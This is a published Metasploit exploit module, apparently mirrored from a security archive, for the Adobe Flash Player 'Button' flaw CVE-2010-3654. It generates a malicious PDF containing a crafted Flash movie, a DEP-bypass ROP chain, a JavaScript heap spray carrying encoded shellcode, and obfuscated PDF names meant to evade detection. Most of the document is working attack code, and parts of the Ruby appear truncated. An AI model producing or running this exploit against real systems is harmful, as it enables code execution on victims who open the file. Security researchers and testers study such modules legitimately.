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Adobe Flash Player "Button" Remote Code Execution

Adobe Flash Player "Button" Remote Code Execution
Posted Nov 3, 2010
Authored by Haifei Li, jduck | Site metasploit.com

This Metasploit module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This Metasploit module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.

tags | exploit, arbitrary, code execution
systems | windows
advisories | CVE-2010-3654
SHA-256 | adf90d0fda6f2de7394643377e0f4d300f5445c02e7d2a421ba4dc2768385036

Adobe Flash Player "Button" Remote Code Execution

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# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
'Name' => 'Adobe Flash Player "Button" Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the handling of certain SWF movies
within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat
are also vulnerable, as are any other applications that may embed Flash player.

Arbitrary code execution is achieved by embedding a specially crafted Flash
movie into a PDF document. An AcroJS heap spray is used in order to ensure
that the memory used by the invalid pointer issue is controlled.

NOTE: This module uses a similar DEP bypass method to that used within the
adobe_libtiff module. This method is unlikely to work across various
Windows versions due a the hardcoded syscall number.
'License' => MSF_LICENSE,
'Author' =>
'Unknown', # Found being openly exploited
'Haifei Li', # PoC
'jduck' # Metasploit version
'Version' => '$Revision: 10857 $',
'References' =>
['CVE', '2010-3654'],
['OSVDB', '68932'],
['BID', '44504'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],
['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC
# For SWF->PDF embedding
['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
'DefaultOptions' =>
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'DisablePayloadHandler' => 'true',
'Payload' =>
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
'Platform' => 'win',
'Targets' =>
# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash -jjd
[ 'Automatic', { }],
'DisclosureDate' => 'Oct 28 2010',
'DefaultTarget' => 0))

OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
], self.class)

def exploit
swf_data = make_swf()
js_data = make_js(payload.encoded)

# Create the pdf
pdf = make_pdf(swf_data, js_data)

print_status("Creating '#{datastore['FILENAME']}' file...")


def make_swf
# load the static swf file
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-3654.swf" )
fd = File.open( path, "rb" )
swf_data = fd.read(fd.stat.size)

def make_js(encoded_payload)

# The following executes a ret2lib using BIB.dll
# The effect is to bypass DEP and execute the shellcode in an indirect way
stack_data = [
0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx
0xc0c0c0c + 0x10,
0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
0x70048ef, # xchg eax,esp / ret
0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009033, # ret 0x18
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7009084, # ret
0x7001599, # pop ebp / ret
0x70072f7, # pop eax / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x70015bb, # pop ecx / ret
0x7ffe0300, # -- location of KiFastSystemCall
0x7007fb2, # mov eax, [ecx] / ret
0x70015bb, # pop ecx / ret
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
0x70015bb, # pop ecx / ret
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
0x70072f7, # pop eax / ret
0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
0x7005c54, # pop esi / add esp,0x14 / ret
# The next bit effectively copies data from the interleaved stack to the memory
# pointed to by eax
# The data copied is:
# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
0x700d731, # mov eax, [ebp-0x24] / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x700154d, # mov [eax], ecx / ret
0x700d731, # mov eax, [ebp-0x24] / ret
0x700112f # call eax -- (execute stub to transition to full shellcode)

var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)

var_start = rand_text_alpha(rand(100) + 1)

var_s = 0x10000
var_c = rand_text_alpha(rand(100) + 1)
var_b = rand_text_alpha(rand(100) + 1)
var_d = rand_text_alpha(rand(100) + 1)
var_3 = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_4 = rand_text_alpha(rand(100) + 1)

payload_buf = ''
payload_buf << stack_data
payload_buf << encoded_payload

escaped_payload = Rex::Text.to_unescape(payload_buf)

js = %Q|
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
#{var_b} += #{var_shellcode};
#{var_b} += #{var_c};
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
var #{var_4} = new Array();
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";


def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr

def ioDef(id)
"%d 0 obj\n" % id

def ioRef(id)
"%d 0 R" % id

def nObfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
result << c

def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
result << ">"

def make_pdf(swf, js)

swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

xref = []
eol = "\n"
endobj = "endobj" << eol

# Randomize PDF version?
pdf = "%PDF-1.5" << eol
#pdf << "%" << RandomNonASCIIString(4) << eol

# catalog
xref << pdf.length
pdf << ioDef(1) << nObfu("<</Type/Catalog")
pdf << nObfu("/Pages ") << ioRef(3)
pdf << nObfu("/OpenAction ") << ioRef(5)
pdf << nObfu(">>")
pdf << eol << endobj

# pages array
xref << pdf.length
pdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj

# page 1
xref << pdf.length
pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3)
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ")
pdf << nObfu(">>")
pdf << eol << endobj

# js action
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj

# js stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj

# swf annotation object
xref << pdf.length
pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia")
pdf << nObfu("/Rect [20 20 187 69] ")
pdf << nObfu("/RichMediaSettings ") << ioRef(8)
pdf << nObfu("/RichMediaContent ") << ioRef(9)
pdf << nObfu("/NM (") << swf_name << nObfu(")")
pdf << nObfu(">>")
pdf << eol << endobj

# rich media settings
xref << pdf.length
pdf << ioDef(8)
pdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash")
pdf << nObfu("/Activation ") << ioRef(10)
pdf << nObfu("/Deactivation ") << ioRef(11)
pdf << nObfu(">>")
pdf << eol << endobj

# rich media content
xref << pdf.length
pdf << ioDef(9)
pdf << nObfu("<</Type/RichMediaContent")
pdf << nObfu("/Assets ") << ioRef(12)
pdf << nObfu("/Configurations [") << ioRef(14) << "]"
pdf << nObfu(">>")
pdf << eol << endobj

# rich media activation / deactivation
xref << pdf.length
pdf << ioDef(10)
pdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>")
pdf << eol << endobj

xref << pdf.length
pdf << ioDef(11)
pdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>")
pdf << eol << endobj

# rich media assets
xref << pdf.length
pdf << ioDef(12)
pdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>")
pdf << eol << endobj

# swf embeded file ref
xref << pdf.length
pdf << ioDef(13)
pdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>")
pdf << eol << endobj

# rich media configuration
xref << pdf.length
pdf << ioDef(14)
pdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash")
pdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>")
pdf << eol << endobj

# rich media isntance
xref << pdf.length
pdf << ioDef(15)
pdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash")
pdf << nObfu("/Asset ") << ioRef(13)
pdf << nObfu(">>")
pdf << eol << endobj

# swf stream
# NOTE: This data is already compressed, no need to compress it again...
xref << pdf.length
pdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
pdf << "stream" << eol
pdf << swf << eol
pdf << "endstream" << eol
pdf << endobj

# trailing stuff
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol

pdf << "trailer" << eol
pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol

pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol

pdf << "%%EOF" << eol

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